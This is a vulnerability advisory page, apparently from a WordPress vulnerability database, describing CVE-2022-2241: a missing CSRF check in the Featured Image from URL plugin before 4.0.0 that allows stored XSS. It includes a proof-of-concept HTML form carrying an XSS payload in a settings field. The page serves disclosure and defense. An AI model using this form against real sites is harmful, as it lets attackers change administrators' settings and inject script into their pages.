Featured Image from URL < 4.0.0 – Arbitrary Settings Update to Stored XSS via CSRF | CVE 2022-2241 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. Furthermore, due to the lack of validation, sanitisation and escaping in some of them, it could also lead to Stored XSS issues

Proof of Concept

<form action="https://example.com/wp-admin/admin.php?page=featured-image-from-url" method="POST">
    <input type="hidden" name="fifu_input_photon" value='on" style=animation-name:rotation onanimationstart=alert(/XSS/)//'/>
    
    <input type="submit" value="Submit request" />
</form>

All settings appear to be affected.

The XSS will be triggered when accessing the settings again

Affects Plugins

featured-image-from-url

Fixed in 4.0.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

8670d196-972b-491b-8d9b-25994a345f57

Timeline

Publicly Published

2022-07-11 (about 1 years ago)

Added

2022-07-11 (about 1 years ago)

Last Updated

2023-04-11 (about 1 years ago)

Other

Published

Title

Published

2019-11-29

Title

ListingPro < 2.0.14.5 - Reflected & Persistent Cross-Site Scripting

Published

2023-05-12

Title

itemprop WP for SERP/SEO Rich snippets <= 3.5.201706131 - Admin+ Stored XSS

Published

2019-08-20

Title

Additional Variation Images for WooCommerce < 1.1.29 - Authenticated Stored XSS

Published

2023-01-03

Title

PDF Viewer < 1.0.0 - Contributor+ Stored XSS via Shortcode

Published

2024-02-19

Title

Link Library < 7.6.1 - Unauthenticated Stored Cross-Site Scripting